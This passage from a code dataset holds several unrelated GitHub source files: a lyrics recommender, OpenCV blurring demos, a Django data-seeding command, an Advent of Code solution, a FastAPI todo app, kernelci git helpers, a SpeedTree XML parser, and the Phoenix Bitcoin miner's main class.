main(args)\n","repo_name":"mxer/ImageClassificationTemplate","sub_path":"inference_multi_gpu.py","file_name":"inference_multi_gpu.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22558168186","text":"import pandas as pd\nfrom sklearn.feature_extraction import text\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n# reading the lyrics csv file\n# error_bad_lines will skip the rows with missing and damaged values\npath = \"azlyrics_lyrics_b.csv\"\nlyrics = pd.read_csv(path, error_bad_lines=False)\n\n# extracting the lyrics from the file into a list\n\nText = lyrics['LYRICS'].tolist()\n\n# vectorize the lyrics using scikit learn\n# removing the stopwords\n\ntfidf = text.TfidfVectorizer(input=Text, stop_words=\"english\")\n\n# build the TF-IDF matrix from the lyrics\n\nmatrix = tfidf.fit_transform(Text)\n\n# printing the size of the vectors\n# output = (no.of.rows in the dataset, no.of unique words in the dataset)\n\nprint(\"VECTOR MATRIX\")\nprint(matrix.shape)\n\n# finding the similar song based on the words of the lyrics using cosine similarity\n\nsimilar_titles = cosine_similarity(matrix)\n\n\n# function to return the \"4\" most similar song titles based on cosine similarity\n\ndef get_similar_articles(x):\n    return \"_\".join(lyrics['SONG_NAME'].loc[x.argsort()[-5:-1]])\n\n\n# calling the function to return the similar songs\n\nlyrics['similar_titles'] = [get_similar_articles(x) for x in similar_titles]\n\n# getting the songs and similar titles\n\nheader = [\"SONG_NAME\", \"similar_titles\"]\n\n# writing the result to csv file\nop = \"export_B_RECOMMENDATION.csv\"\nlyrics.to_csv(op, columns=header)\n\n# test cases\n\nfor x in range(0, 100):\n    print(\"\\nTest case %d\" % x)\n    print(\"Song Name: %s\" % lyrics['SONG_NAME'].str.replace(\"_\", \" \").str.upper().str.strip()[x])\n    print(\"Recommendation: %s\" %\n          lyrics['similar_titles'].str.replace(\"_\", \"\\n\").str.upper().str.strip().str.split(\"\\n\")[x])\n","repo_name":"anand-surya/ISTE-612-Project","sub_path":"recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16309475727","text":"import cv2 as cv\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n\r\nimg = cv.imread(\"opencv-logo.png\")\r\nimg = cv.cvtColor(img,cv.COLOR_BGR2RGB)\r\n\r\nkernel = np.ones((5,5),np.float32)/25\r\ndst = cv.filter2D(img,-1,kernel)\r\nblur = cv.blur(img,(5,5))\r\ngblur = cv.GaussianBlur(img,(5,5),0)\r\nmedian = cv.medianBlur(img,5) # useful for salt-and-pepper noise\r\nbilateralFilter = cv.bilateralFilter(img,9,75,75) #(src, pixel neighborhood diameter, sigmaColor, sigmaSpace) keeps edges sharp\r\n\r\n\r\ntitles = [\"image\",\"2D Convolution\",\"Blur\",\"GaussianBlur\",\"MedianBlur\",\"BilateralBlur\"]\r\nimages = [img,dst,blur,gblur,median,bilateralFilter]\r\n\r\nfor i in range(6):\r\n    plt.subplot(2,4,i+1),plt.imshow(images[i],'gray')\r\n    plt.title(titles[i])\r\n    plt.xticks([]),plt.yticks([])\r\n\r\nplt.show() \r\n","repo_name":"vaishnavidatir/Opencv","sub_path":"smoothing_images_and_image_bluring.py","file_name":"smoothing_images_and_image_bluring.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12149277673","text":"from django.core.management.base import BaseCommand\nimport pandas as pd\nfrom hotels.models import Hotel, Amenity, Room, HotelImages, Review, FAQ, HouseRules\nimport random\nimport os\nfrom django.core.files import File\nfrom account_manager.models import User\nfrom faker import Faker\nimport shutil\n\n\nclass Command(BaseCommand):\n    help = \"Import data from CSV file\"\n\n    def add_arguments(self, parser):\n        parser.add_argument(\"path\", type=str, help=\"Path to CSV file\")\n\n    def handle(self, *args, **kwargs):\n        fake = Faker()\n        # fake.seed(4321)\n        path = kwargs[\"path\"]\n        room_types = set()\n        df = pd.read_csv(path)\n        hotel_names = set()\n\n        for _, row in df.iterrows():\n            room_type = [\n                room\n                for room in str(row[\"Tags\"]).strip(\"[]\").split(\",\")\n                if \"Room\" in room\n            ]\n\n            if len(room_type) > 0:\n                if room_type[0] not in room_types:\n                    # the room_type[0] is of the form ' 'Room' '\n                    room_type = room_type[0].strip(\"' \")\n                    room_types.add(room_type)\n        room_types = list(room_types)\n        price_map = {}\n\n        for each in room_types:\n            price_map[each] = random.randint(300, 1500)\n\n        for _, row in df.iterrows():\n            if (\n                row[\"Hotel_Name\"] in hotel_names\n            ):  # check if 
the hotel name already exists\n continue\n hotel_names.add(row[\"Hotel_Name\"]) # add the hotel name to the set\n hotel = Hotel.objects.create(\n name=row[\"Hotel_Name\"],\n address=row[\"Hotel_Address\"],\n room_count=random.randint(1, 11),\n hotel_score=row[\"Average_Score\"],\n lat=row[\"lat\"] if type(row[\"lat\"]) == float else 0.0,\n lng=row[\"lng\"] if type(row[\"lng\"]) == float else 0.0,\n approved=True,\n )\n for i in range(1, random.randint(8, 20)):\n amenity = Amenity.objects.get(id=random.randint(1, 70))\n hotel.amenities.add(amenity)\n\n hotel_image_path = \"hotel_images/\"\n hotel_image_filename = random.choice(os.listdir(hotel_image_path))\n hotel_image = HotelImages.objects.create(\n hotel=hotel, image=hotel_image_path + hotel_image_filename\n )\n hotel_image.image.save(\n hotel_image_filename,\n File(open(hotel_image_path + hotel_image_filename, \"rb\")),\n )\n faq_questions = [\n \"What is your return policy?\",\n \"What are your shipping options?\",\n \"How do I track my order?\",\n \"Do you offer gift cards?\",\n \"What payment methods do you accept?\",\n ]\n\n for question in faq_questions:\n answer = fake.text(max_nb_chars=200)\n\n faq = FAQ.objects.create(\n hotel=hotel,\n question=question,\n answer=answer,\n )\n faq.save()\n\n house_rule = HouseRules.objects.create(\n hotel=hotel,\n smoking_allowed=random.choice([True, False]),\n pets_allowed=random.choice([True, False]),\n parties_allowed=random.choice([True, False]),\n self_check_in=random.choice([True, False]),\n )\n house_rule.save()\n\n room_images_path = \"room_images/\"\n room_images = os.listdir(room_images_path)\n\n for i in range(1, hotel.room_count + 1):\n random_room_type = room_types[random.randint(0, len(room_types) - 1)]\n room_image_filename = random.choice(room_images)\n room_image_path = os.path.join(room_images_path, room_image_filename)\n\n # create a new unique file name for the image\n room_image_newname = f\"{hotel}_{i}.jpg\"\n\n # copy the image to the media folder and rename it\n\n # create a new room object and set its image field\n room = Room.objects.create(\n hotel=hotel,\n room_type=random_room_type,\n price=price_map[random_room_type],\n quantity=random.randint(1, 10),\n )\n room.image.save(room_image_newname, File(open(room_image_path, \"rb\")))\n room.save()\n users = []\n for i in range(1, 51):\n name = fake.name().split()\n first_name = name[0]\n last_name = name[1]\n email = fake.ascii_free_email()\n gender = random.choice([\"Male\", \"Female\", \"Others\"])\n country = random.choice(df[\"Reviewer_Nationality\"].unique())\n user = User.objects.create(\n first_name=first_name,\n last_name=last_name,\n email=email,\n gender=gender,\n country=country,\n is_active=True,\n )\n user.set_password(\"user123\")\n user.save()\n users.append(user)\n\n for user in users:\n for i in range(random.randint(1, 4)):\n hotel = random.choice(Hotel.objects.all())\n rooms = Room.objects.filter(hotel=hotel)\n if rooms:\n room = random.choice(rooms)\n found_hotel = df.loc[df[\"Hotel_Name\"] == hotel.name]\n\n Review.objects.create(\n user=user,\n hotel=hotel,\n room=room,\n score=found_hotel[\"Reviewer_Score\"].iloc[0],\n review=found_hotel[\"Positive_Review\"].iloc[0]\n + found_hotel[\"Negative_Review\"].iloc[0],\n stay_duration=random.randint(1, 10),\n )\n else:\n 
pass\n","repo_name":"OzoneBht1/Hotel_Booking_System","sub_path":"backend/hotels/management/commands/populateModels.py","file_name":"populateModels.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"10513531791","text":"from collections import Counter\nfrom enum import Enum\n\n\nclass Pixel(Enum):\n    BLACK = '0'\n    WHITE = '1'\n    TRANSPARENT = '2'\n\n\nclass Image():\n    def __init__(self, width, height, data=None):\n        self.width = width\n        self.height = height\n        self.layers = []\n        self.data = [Pixel.TRANSPARENT] * (width * height)\n        if data:\n            self.add_layer(data)\n\n    def add_layer(self, layer):\n        layer = [Pixel(pixel) for pixel in layer]\n        self.layers.append(layer)\n        for index, pixel in enumerate(layer):\n            if self.data[index] == Pixel.TRANSPARENT:\n                self.data[index] = pixel\n\n    def show(self):\n        image_rows = [self.data[i:i+self.width] for i in range(0, len(self.data), self.width)]\n\n        for row in image_rows:\n            for pixel in row:\n                if pixel == Pixel.BLACK:\n                    print(' ', end='')\n                elif pixel == Pixel.WHITE:\n                    print('#', end='')\n                else:\n                    print('?', end='')\n            print('')\n\n\ndef main():\n    with open('day08/input') as file:\n        data = list(file.read())[:-1]\n\n    print(data)\n    dimensions = 25 * 6\n    print(f'{len(data)} / {dimensions} = {len(data) / (dimensions)}')\n\n    layers = [data[i:i+dimensions] for i in range(0, len(data), dimensions)]\n\n    print(layers[0])\n    print(len(layers[0]))\n\n    counters = [Counter(layer) for layer in layers]\n\n    num_zeros = 200\n    best_index = None\n\n    for index, counter in enumerate(counters):\n        if num_zeros > counter['0']:\n            num_zeros = counter['0']\n            best_index = index\n\n    answer = counters[best_index]\n\n    print(answer['1'] * answer['2'])\n\n\ndef main2():\n    width, height = 25, 6\n    with open('day08/input') as file:\n        # data = [Pixel(pixel) for pixel in (file.read()) if pixel != '\\n']\n        data = list(file.read())[:-1]\n\n    dimensions = width * height\n\n    layers = [data[i:i+dimensions] for i in range(0, len(data), dimensions)]\n\n    image = Image(width=25, height=6)\n\n    for layer in layers:\n        image.add_layer(layer)\n\n    image.show()\n\n\nif __name__ == \"__main__\":\n    main()\n    main2()\n","repo_name":"paul-schwendenman/advent-of-code-2019","sub_path":"day08/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74456283560","text":"from fastapi import FastAPI, Request\nfrom fastapi.responses import RedirectResponse, FileResponse\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nfrom starlette import status\n\nimport driver_database as dd\n\n\napp = FastAPI()\ntemplates = Jinja2Templates(directory=\"templates\")\napp.mount('/static', StaticFiles(directory='static'), name='static')\n\n\n@app.get('/favicon.ico', include_in_schema=False)\nasync def favicon():\n    return FileResponse(\"static/image/favicon.ico\")\n\n\n@app.get('/')\nasync def root(request: Request):\n    data = await dd.get_data()\n\n    return templates.TemplateResponse(\n        name=\"root.html\",\n        context={\"request\": request, \"tododict\": data},\n        status_code=status.HTTP_200_OK\n    )\n\n\n@app.get(\"/delete/{id}\")\nasync def delete_todo(request: Request, id: str):\n    data = await dd.get_data()\n    del data[id]\n    await dd.write_data(data=data)\n\n    return RedirectResponse(\n        url=\"/\",\n        status_code=status.HTTP_307_TEMPORARY_REDIRECT\n    
)\n\n\n@app.post(\"/add\")\nasync def add_todo(request: Request):\n data = await dd.get_data()\n newdata = dict()\n i = 1\n for id in data:\n newdata[str(i)] = data[id]\n i += 1\n formdata = await request.form()\n newdata[str(i)] = formdata[\"newtodo\"]\n\n await dd.write_data(newdata)\n\n return RedirectResponse(\n url=\"/\",\n status_code=status.HTTP_303_SEE_OTHER\n )\n","repo_name":"mertwec/notes_todo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11500412015","text":"import configparser\nimport datetime\nimport github\nimport os\nimport re\nimport subprocess\n\n# Mainline kernel URL from torvalds\nTORVALDS_GIT_URL = \\\n \"git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git\"\n\n# Terminal colors...\nCOLORS = {\n 'green': '\\033[92m',\n 'yellow': '\\033[93m',\n 'red': '\\033[91m',\n 'blue': '\\033[94m',\n 'clear': '\\033[0m',\n}\n\n# Github API handler\nGITHUB = github.Github()\n\n\ndef print_color(color, msg):\n print(''.join([COLORS[color], msg, COLORS['clear']]))\n\n\ndef shell_cmd(cmd):\n return subprocess.check_output(cmd, shell=True).decode()\n\n\ndef default_ssh_key(ssh_key, branch):\n if ssh_key:\n return ssh_key\n\n ssh_key_name = '_'.join(['id_rsa', branch])\n ssh_key_path = os.path.join('keys', ssh_key_name)\n if os.path.exists(ssh_key_path):\n return ssh_key_path\n\n return None\n\n\ndef ssh_agent(ssh_key, cmd):\n if ssh_key:\n cmd = \"ssh-agent sh -c 'ssh-add {key}; {cmd}'\".format(\n key=ssh_key, cmd=cmd)\n shell_cmd(cmd)\n\n\ndef date_tag(path, px, fmt=\"%Y%m%d\"):\n tag_name = \"{}{}\".format(px, datetime.date.today().strftime(fmt))\n try:\n n = int(shell_cmd(\"\"\"\ncd {path}\ngit fetch --quiet --tags origin\ngit tag -l | grep -c {tag}\n\"\"\".format(path=path, tag=tag_name)))\n except subprocess.CalledProcessError:\n n = 0\n tag_name = '.'.join([tag_name, str(n)])\n return tag_name\n\n\ndef create_tag(path, tag):\n shell_cmd(\"\"\"\\\ncd {path}\ngit tag -l | grep {tag} && git tag -d {tag}\ngit tag -a {tag} -m {tag}\n\"\"\".format(path=path, tag=tag))\n return tag\n\n\ndef list_tags(path, pattern='^.*'):\n shell_cmd(\"\"\"\\\ncd {path}\ngit tag -l | grep -e '{pattern}' | xargs git tag -d\ngit fetch -q --tags origin\n\"\"\".format(path=path, pattern=pattern))\n cmd = \"cd {path}; git tag -l | grep -e '{pattern}'\".format(\n path=path, pattern=pattern\n )\n tags = sorted(shell_cmd(cmd).split())\n return tags\n\n\ndef delete_tags(path, tags, ssh_key):\n slices = []\n index = 0\n n_tags = len(tags)\n slice_max_len = 100\n while index != n_tags:\n slice_len = min((n_tags - index), slice_max_len)\n slices.append(tags[index:index+slice_len])\n index += slice_len\n for tags_slice in slices:\n tags_str = ' '.join(tags_slice)\n print(\"Deleting {}\".format(tags_str))\n cmd = \"cd {}; echo {} | xargs git tag -d\".format(path, tags_str)\n shell_cmd(cmd)\n tags_push_str = ' :'.join(tags_slice)\n cmd = \"cd {}; echo :{} | xargs git push origin\".format(\n path, tags_push_str)\n ssh_agent(ssh_key, cmd)\n\n\ndef delete_old_tags(args, path, ssh_key):\n tags = list_tags(path, args.tag_prefix + \"*\")\n if len(tags) > args.tag_limit:\n limit = args.tag_limit * -1\n to_delete = tags[:limit]\n print(\"Deleting {} tags: {}{}\".format(\n len(to_delete), to_delete[0],\n \"...{}\".format(to_delete[-1]) if len(to_delete) > 1 else \"\"))\n delete_tags(path, to_delete, ssh_key)\n\n\ndef checkout_repository(path, repo, origin=\"origin\", 
branch=\"main\"):\n if not os.path.exists(path):\n shell_cmd(\"\"\"\\\ngit clone {url} {path}\ncd {path}\ngit remote set-url --push origin {push}\n\"\"\".format(path=path, url=repo.clone_url, push=repo.ssh_url))\n\n shell_cmd(\"\"\"\\\ncd {path}\ngit reset --quiet --hard --merge\ngit fetch --quiet {origin} {branch}\ngit checkout FETCH_HEAD\ngit config user.name \"kernelci.org bot\"\ngit config user.email \"bot@kernelci.org\"\n\"\"\".format(path=path, origin=origin, branch=branch))\n\n\ndef origin_diff(path, branch):\n shell_cmd(\"\"\"\\\ncd {path}\ngit remote update origin\n\"\"\".format(path=path))\n diff = shell_cmd(\"\"\"\\\ncd {path}\ngit diff origin/{branch}..HEAD\n\"\"\".format(path=path, branch=branch))\n return diff\n\n\ndef _find_patches(path):\n patches_re = re.compile('.*\\.(patch|mbx)$')\n for root, dirs, files in os.walk(path):\n for file_name in files:\n if patches_re.match(file_name):\n yield os.path.join(root, file_name)\n\n\ndef apply_patches(path, patches_path):\n patches = list(sorted(_find_patches(patches_path)))\n for patch in patches:\n print(\"Applying patch: {}\".format(patch))\n try:\n shell_cmd(\"\"\"\\\ncat {patch} | (cd {path} && git am)\n\"\"\".format(path=path, patch=patch))\n except subprocess.CalledProcessError:\n print(\"WARNING: Failed to apply patch\")\n shell_cmd(\"\"\"\\\ncd {path}\ngit am --abort\n\"\"\".format(path=path))\n return False\n return True\n\n\ndef push_tag_and_branch(path, ssh_key, branch, tag):\n ssh_agent(ssh_key, \"\"\"\\\ncd {path}\ngit push --quiet --force origin HEAD:{branch} {tag}\n\"\"\".format(path=path, branch=branch, tag=(tag or '')))\n\n\nclass Settings:\n\n def __init__(self, path, section):\n self._settings = configparser.ConfigParser()\n if path:\n self._settings.read(path)\n self._section = section\n\n def get(self, option, as_list=False):\n if not self._settings.has_option(self._section, option):\n return None\n value = self._settings.get(self._section, option).split()\n if not as_list and len(value) == 1:\n value = value[0]\n return value\n","repo_name":"kernelci/kernelci-deploy","sub_path":"kernelci/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"16309475727","text":"import cv2 as cv\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n\r\nimg = cv.imread(\"opencv-logo.png\")\r\nimg = cv.cvtColor(img,cv.COLOR_BGR2RGB)\r\n\r\nkernel = np.ones((5,5),np.float32)/25\r\ndst = cv.filter2D(img,-1,kernel)\r\nblur = cv.blur(img,(5,5))\r\ngblur = cv.GaussianBlur(img,(5,5),0)\r\nmedian = cv.medianBlur(img,5) #use for salt and pepper dots\r\nbilateralFilter = cv.bilateralFilter(img,9,75,75) #(src,diameter of area,color,color) for getting sharp edge\r\n\r\n\r\ntitles = [\"imgage\",\"2D convolution \",\"Blur\",\"GaussianBlur\",\"MedialBlur\",\"BilateralBlur\"]\r\nimages = [img,dst,blur,gblur,median,bilateralFilter]\r\n\r\nfor i in range(6):\r\n plt.subplot(2,4,i+1),plt.imshow(images[i],'gray')\r\n plt.title(titles[i])\r\n plt.xticks([]),plt.yticks([])\r\n\r\nplt.show() \r\n","repo_name":"vaishnavidatir/Opencv","sub_path":"smoothing_images_and_image_bluring.py","file_name":"smoothing_images_and_image_bluring.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70787239081","text":"import sys\nimport math\nimport xml.dom.minidom as xmldom\n\ndef xmlElementToType(node, tag, 
typeCast):\n return [typeCast(elt) for elt in node.getElementsByTagName(tag)[0].firstChild.toxml().split()]\n\ndef meshVertices(lod):\n vtx = lod.getElementsByTagName(\"Vertices\")[0]\n dataList = [ xmlElementToType(vtx, tag, float) for tag in [\"X\",\"Y\",\"Z\",\"TexcoordU\",\"TexcoordV\"] ]\n\n return {\n \"pnt\":list(zip(dataList[0],dataList[1],dataList[2])),\n \"u\":dataList[3],\n \"v\":dataList[4]\n }\n\ndef meshQuadIndices(lod):\n return xmlElementToType(lod, \"QuadIndices\", int)\n\ndef meshData(mesh):\n return {\n \"id\":mesh.attributes[\"ID\"].value,\n \"name\":mesh.attributes[\"Name\"].value.replace(\" \",\"_\"),\n \"LOD\":[{\n \"level\":float(lod.attributes[\"Level\"].value),\n \"scale\":float(lod.attributes[\"OriginalScale\"].value),\n \"quadIdx\":meshQuadIndices(lod),\n \"triIdx\":xmlElementToType(lod, \"TriangleIndices\", int),\n \"vtx\":meshVertices(lod)} for lod in mesh.getElementsByTagName(\"LOD\")]\n }\n\ndef readMeshes(doc):\n meshes = doc.getElementsByTagName('Meshes')\n # print(meshes[0].firstChild.toxml())\n meshList = []\n \n for mesh in meshes[0].getElementsByTagName('Mesh'):\n meshList.append(meshData(mesh))\n\n return meshList\n\n# def readFoliages(doc):\n# foliages = []\n# for LeafReferences in doc.getElementsByTagName('LeafReferences'):\n# pntList = [ xmlElementToType(LeafReferences, tag, float) for tag in [\"X\",\"Y\",\"Z\"] ]\n# rotAxisList = [ xmlElementToType(LeafReferences, tag, float) for tag in [\"RotAxisX\",\"RotAxisY\",\"RotAxisZ\"] ]\n\n# foliages.append( {\n# \"pnt\":list(zip(*pntList)),\n# \"rotAxis\":list(zip(*rotAxisList)),\n# \"rotRadian\":[math.radians(angle) for angle in xmlElementToType(LeafReferences, \"RotAngle\", float)],\n# \"scale\":xmlElementToType(LeafReferences, \"Scale\", float),\n# \"meshId\":xmlElementToType(LeafReferences, \"MeshID\", int),\n# \"boneId\":xmlElementToType(LeafReferences, \"BoneID\", int)\n# } )\n\n# return foliages\n\ndef boneData(bone):\n return {\n \"id\":int(bone.attributes[\"ID\"].value),\n \"parentId\":int(bone.attributes[\"ParentID\"].value),\n \"radius\":float(bone.attributes[\"Radius\"].value),\n \"mass\":float(bone.attributes[\"Mass\"].value),\n \"start\":[float(bone.attributes[\"StartX\"].value),float(bone.attributes[\"StartY\"].value),float(bone.attributes[\"StartZ\"].value)],\n \"end\":[float(bone.attributes[\"EndX\"].value),float(bone.attributes[\"EndY\"].value),float(bone.attributes[\"EndZ\"].value)]\n }\n\ndef spineData(spine):\n pntList = [ xmlElementToType(spine, tag, float) for tag in [\"X\",\"Y\",\"Z\"] ]\n return {\n \"pnt\":list(zip(*pntList)),\n \"radius\":xmlElementToType(spine, \"Radius\", float)\n }\n\ndef readBones(doc):\n return {\n \"spine\":[spineData(spine) for spine in doc.getElementsByTagName('Spine')],\n \"bones\":[boneData(bone) for bone in doc.getElementsByTagName('Bone')]\n }\n\ndef readObjects(doc):\n objList = []\n for obj in doc.getElementsByTagName('Object')[1:]:\n objData={}\n objData['name'] = obj.attributes[\"Name\"].value.replace(\" \",\"_\")\n objData['id'] = int(obj.attributes[\"ID\"].value)\n \n points = obj.getElementsByTagName('Points')[0]\n objData['pntNum'] = int(points.attributes[\"Count\"].value)\n pntList = [ xmlElementToType(points, tag, float) for tag in [\"X\",\"Y\",\"Z\"] ]\n objData['pnt'] = list(zip(*pntList))\n\n vtx = obj.getElementsByTagName('Vertices')[0]\n objData['u'] = xmlElementToType(vtx, \"TexcoordU\", float)\n objData['v'] = xmlElementToType(vtx, \"TexcoordV\", float)\n\n objData[\"boneId\"] = xmlElementToType(vtx, \"BoneID\", int)\n\n tri = 
obj.getElementsByTagName('Triangles')[0]\n objData[\"triangleNum\"] = int(tri.attributes[\"Count\"].value)\n objData[\"pntIdx\"] = xmlElementToType(tri, \"PointIndices\", int)\n objData[\"vtxIdx\"] = xmlElementToType(tri, \"VertexIndices\", int)\n\n objData[\"orgP\"] = [ float(obj.attributes['AbsX'].value), float(obj.attributes['AbsY'].value), float(obj.attributes['AbsZ'].value) ]\n\n leafRefList = obj.getElementsByTagName('LeafReferences')\n\n if leafRefList:\n leafRef = leafRefList[0]\n pntList = [ xmlElementToType(leafRef, tag, float) for tag in [\"X\",\"Y\",\"Z\"] ]\n rotAxisList = [ xmlElementToType(leafRef, tag, float) for tag in [\"RotAxisX\",\"RotAxisY\",\"RotAxisZ\"] ]\n\n objData[\"LeafRef\"] = {\n \"pnt\":list(zip(*pntList)),\n \"rotAxis\":list(zip(*rotAxisList)),\n \"rotRadian\":[math.radians(angle) for angle in xmlElementToType(leafRef, \"RotAngle\", float)],\n \"scale\":xmlElementToType(leafRef, \"Scale\", float),\n \"meshId\":xmlElementToType(leafRef, \"MeshID\", int),\n \"boneId\":xmlElementToType(leafRef, \"BoneID\", int)\n }\n\n objList.append(objData)\n\n return objList\n\ndef readTree(xmlFile):\n doc = xmldom.parse(xmlFile)\n return {\n \"objects\":readObjects(doc),\n \"meshes\":readMeshes(doc),\n # \"foliages\":readFoliages(doc),\n \"bones\":readBones(doc)\n }\n\nif __name__ == \"__main__\":\n readTree(sys.argv[1])\n","repo_name":"bambooshoot/tree","sub_path":"py/speedTreeRawXml.py","file_name":"speedTreeRawXml.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7101000405","text":"import platform\nfrom time import time\nfrom twisted.internet import reactor\nfrom minerutil.MMPProtocol import MMPClient\nfrom KernelInterface import KernelInterface\n\n#The main managing class for the miner itself.\nclass Miner(object):\n\n # This must be manually set for Git\n VER = (1, 7, 5)\n REVISION = reduce(lambda x,y: x*100+y, VER)\n VERSION = 'v%s' % '.'.join(str(x) for x in VER)\n\n def __init__(self):\n self.logger = None\n self.options = None\n self.connection = None\n self.kernel = None\n self.queue = None\n self.idle = True\n self.cores = []\n self.backup = False\n self.failures = 0\n self.lastMetaRate = 0.0\n self.lastRateUpdate = time()\n\n # Connection callbacks...\n def onFailure(self):\n self.logger.reportConnectionFailed()\n\n #handle failover if url2 has been specified\n if self.options.url2 is not None:\n self.failoverCheck()\n\n def onConnect(self):\n self.logger.reportConnected(True)\n def onDisconnect(self):\n self.logger.reportConnected(False)\n def onBlock(self, block):\n self.logger.reportBlock(block)\n def onMsg(self, msg):\n self.logger.reportMsg(msg)\n def onWork(self, work):\n self.logger.reportDebug('Server gave new work; passing to WorkQueue')\n self.queue.storeWork(work)\n def onLongpoll(self, lp):\n self.logger.reportType('RPC' + (' (+LP)' if lp else ''))\n def onPush(self, ignored):\n self.logger.log('LP: New work pushed')\n def onLog(self, message):\n self.logger.log(message)\n def onDebug(self, message):\n self.logger.reportDebug(message)\n\n def failoverCheck(self):\n if self.backup:\n if (self.failures >= 1):\n #disconnect and set connection to none\n self.connection.disconnect()\n self.connection = None\n\n #log\n self.logger.log(\"Backup server failed,\")\n self.logger.log(\"attempting to return to primary server.\")\n\n #reset failure count and return to primary server\n self.failures = 0\n self.backup = False\n self.connection = 
self.options.makeConnection(self)\n                self.connection.connect()\n            else:\n                self.failures += 1\n        else:\n            #The main pool must fail 3 times before moving to the backup pool\n            if (self.failures >= 2):\n                #disconnect and set connection to none\n                self.connection.disconnect()\n                self.connection = None\n\n                #log\n                self.logger.log(\"Primary server failed too many times,\")\n                self.logger.log(\"attempting to connect to backup server.\")\n\n                #reset failure count and connect to backup server\n                self.failures = 0\n                self.backup = True\n                self.connection = self.options.makeConnection(self, True)\n                self.connection.connect()\n            else:\n                self.failures += 1\n\n        #since the main pool may fail from time to time, decrement the\n        #failure count after 5 minutes so we don't end up moving to the\n        #backup pool when it isn't necessary\n        def decrementFailures():\n            if self.failures > 1 and (not self.backup):\n                self.failures -= 1\n        reactor.callLater(300, decrementFailures)\n\n    def start(self, options):\n        #Configures the Miner via the options specified and begins mining.\n\n        self.options = options\n        self.logger = self.options.makeLogger(self, self)\n        self.connection = self.options.makeConnection(self)\n        self.kernel = self.options.makeKernel(KernelInterface(self))\n        self.queue = self.options.makeQueue(self)\n\n        #log a message to let the user know that phoenix is starting\n        self.logger.log(\"Phoenix %s starting...\" % self.VERSION)\n\n        #this will need to be changed to add new protocols\n        if isinstance(self.connection, MMPClient):\n            self.logger.reportType('MMP')\n        else:\n            self.logger.reportType('RPC')\n\n        self.applyMeta()\n\n        # Go!\n        self.connection.connect()\n        self.kernel.start()\n        reactor.addSystemEventTrigger('before', 'shutdown', self.shutdown)\n\n    def shutdown(self):\n        \"\"\"Disconnect from the server and kill the kernel.\"\"\"\n        self.kernel.stop()\n        self.connection.disconnect()\n\n    def applyMeta(self):\n        #Applies any static metafields to the connection, such as version,\n        #kernel, hardware, etc.\n\n        # It's important to note here that the name is already put in place by\n        # the Options's makeConnection function, since the Options knows the\n        # user's desired name for this miner anyway.\n\n        self.connection.setVersion(\n            'phoenix', 'Phoenix Miner', self.VERSION)\n        system = platform.system() + ' ' + platform.version()\n        self.connection.setMeta('os', system)\n\n    #called by CoreInterface to add cores for total hashrate calculation\n    def _addCore(self, core):\n        self.cores.append(core)\n\n    #used by WorkQueue to report when the miner is idle\n    def reportIdle(self, idle):\n\n        #if idle status has changed force an update\n        if self.idle != idle:\n            if idle:\n                self.idle = idle\n                self.logger.log(\"Warning: work queue empty, miner is idle\")\n                self.logger.reportRate(0, True)\n                self.connection.setMeta('rate', 0)\n                self.lastMetaRate = time()\n                self.idleFixer()\n            else:\n                self.idle = idle\n                self.logger.updateStatus(True)\n\n    #request work from the protocol every 15 seconds while idle\n    def idleFixer(self):\n        if self.idle:\n            self.connection.requestWork()\n            reactor.callLater(15, self.idleFixer)\n\n    def updateAverage(self):\n        #Query all mining cores for their Khash/sec rate and sum.\n\n        total = 0\n        if not self.idle:\n            for core in self.cores:\n                total += core.getRate()\n\n        self.logger.reportRate(total)\n\n        # Let's not spam the server with rate messages.\n        if self.lastMetaRate+30 < time():\n            self.connection.setMeta('rate', total)\n            self.lastMetaRate = 
time()","repo_name":"jedi95/Phoenix-Miner","sub_path":"Miner.py","file_name":"Miner.py","file_ext":"py","file_size_in_byte":6470,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"18"} +{"seq_id":"27254448197","text":"# Author: Forest Bond\n# This file is in the public domain.\n\nfrom __future__ import with_statement, unicode_literals\n\nimport os, sys, shutil\nfrom tempfile import mkdtemp\nfrom modulefinder import Module\nfrom distutils.command.build import build\nfrom distutils.command.clean import clean as _clean\nfrom distutils.command.install import install\nfrom distutils.command.install_lib import install_lib as _install_lib\nfrom distutils.command.install_data import install_data as _install_data\nfrom distutils.core import (\n setup as _setup,\n Command,\n)\nfrom distutils.spawn import spawn\nfrom distutils import log\nfrom distutils.dir_util import remove_tree\nfrom distutils.dist import Distribution\n\ntry:\n from py2exe.build_exe import py2exe as _py2exe\nexcept ImportError:\n _py2exe = None\nelse:\n from py2exe.build_exe import byte_compile\n\n\n###\n\n\nclass test(Command):\n description = 'run tests'\n user_options = [\n ('tests=', None, 'names of tests to run'),\n ('print-only', None, \"don't run tests, just print their names\"),\n ('coverage', None, \"print coverage analysis 